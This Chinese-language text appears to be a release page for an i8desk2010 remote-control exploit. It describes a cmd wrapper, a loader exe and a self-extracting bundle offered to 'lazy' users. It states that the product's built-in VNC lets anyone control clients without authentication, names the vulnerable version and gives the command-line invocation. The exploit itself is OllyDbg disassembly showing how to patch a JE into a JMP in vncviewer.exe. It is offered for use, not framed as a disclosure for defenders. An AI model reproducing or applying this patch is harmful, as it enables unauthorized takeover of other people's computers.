i8 远程控制漏洞利用程序:
这个文件就是按《i8desk2010客户端远程控制漏洞》这个方法修改的。
一段cmd脚本,用来将参数传入i8vnc_crack.exe,纯粹的为了使用方便。
与上面那个i8vnc_loader作用一样,只不过是做成exe版本的了,并且多了个ip地址检查的小功能。
这个版本实际上就是将i8vnc_loader.exe和i8vnc_crack.exe两个文件用rar压缩生成自解压文件,并在解压到临时文件夹后执行i8vnc_loader.exe,懒人和不知道怎么用的人就下载这个吧。
i8desk2010 内置了一个VNC远程控制,这会给维护带来很大方便,但是这个VNC有严重的问题,那就是客户端不需要身份验证即可被远程控制。
有问题的版本为:i8Client 10.1.0.329
将i8desk2010服务端内的vncviewer.exe分离出来,用OllyDbg修改以下内容,再以“IP|1”(例如:D:\vncviewer.exe 192.168.27.6|1)的格式作为参数传入vncviewer.exe便可控制任意i8客户端。
0040BB1A |. 83C4 08 ADD ESP,8
0040BB1D |. 85C0 TEST EAX,EAX
0040BB1F 74 1B JE SHORT vncview.0040BB3C ;将这个JE改成JMP,就可以远程控制任意一个i8客户端了。
0040BB21 |> 6A 00 PUSH 0 ; /Style = MB_OK|MB_APPLMODAL
0040BB23 |. 68 A4BE4100 PUSH vncview.0041BEA4 ; |Title = "VNC"
0040BB1A |. 83C4 08 ADD ESP,8
0040BB1D |. 85C0 TEST EAX,EAX
0040BB1F EB 1B JMP SHORT vncview.0040BB3C ;这是改完的结果。
0040BB21 |> 6A 00 PUSH 0 ; /Style = MB_OK|MB_APPLMODAL
0040BB23 |. 68 A4BE4100 PUSH vncview.0041BEA4 ; |Title = "VNC"
